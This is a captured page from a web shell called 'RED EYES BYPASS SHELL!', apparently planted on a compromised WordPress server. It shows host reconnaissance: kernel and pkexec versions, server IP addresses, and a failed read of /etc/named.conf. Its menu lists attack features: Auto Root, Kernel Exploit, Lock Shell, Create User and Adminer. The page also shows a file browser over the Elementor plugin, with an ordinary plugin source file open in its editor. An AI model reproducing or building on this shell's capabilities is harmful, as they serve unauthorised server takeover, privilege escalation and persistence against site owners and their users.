Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
nurse /
wp-content /
plugins /
elementor /
core /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
admin
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
base
[ DIR ]
drwxr-xr-x
behaviors
[ DIR ]
drwxr-xr-x
breakpoints
[ DIR ]
drwxr-xr-x
common
[ DIR ]
drwxr-xr-x
debug
[ DIR ]
drwxr-xr-x
document-types
[ DIR ]
drwxr-xr-x
dynamic-tags
[ DIR ]
drwxr-xr-x
editor
[ DIR ]
drwxr-xr-x
experiments
[ DIR ]
drwxr-xr-x
files
[ DIR ]
drwxr-xr-x
frontend
[ DIR ]
drwxr-xr-x
isolation
[ DIR ]
drwxr-xr-x
kits
[ DIR ]
drwxr-xr-x
logger
[ DIR ]
drwxr-xr-x
page-assets
[ DIR ]
drwxr-xr-x
responsive
[ DIR ]
drwxr-xr-x
role-manager
[ DIR ]
drwxr-xr-x
schemes
[ DIR ]
drwxr-xr-x
settings
[ DIR ]
drwxr-xr-x
upgrade
[ DIR ]
drwxr-xr-x
utils
[ DIR ]
drwxr-xr-x
documents-manager.php
18.98
KB
-rwxr-xr-x
modules-manager.php
3.16
KB
-rwxr-xr-x
wp-api.php
1.11
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-api.php
<?php namespace Elementor\Core; use Elementor\Core\Utils\Collection; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } /** * This class is responsible for the interaction with WordPress Core API. * The main benefit is making it easy to mock in testing * and it can help to create unit tests without the hustle of mocking WordPress itself. */ class Wp_Api { /** * @var Collection */ private $plugins; /** * @return Collection */ public function get_plugins() { if ( ! $this->plugins ) { $this->plugins = new Collection( get_plugins() ); } return $this->plugins; } /** * @return Collection */ public function get_active_plugins() { return $this->get_plugins() ->only( get_option( 'active_plugins' ) ); } /** * @return object|array */ public function plugins_api( $action, $args ) { return plugins_api( $action, $args ); } /** * @return bool */ public function is_plugin_active( $plugin ) { return is_plugin_active( $plugin ); } /** * @return bool|int|null|true */ public function activate_plugin( $plugin ) { return activate_plugin( $plugin ); } }
Close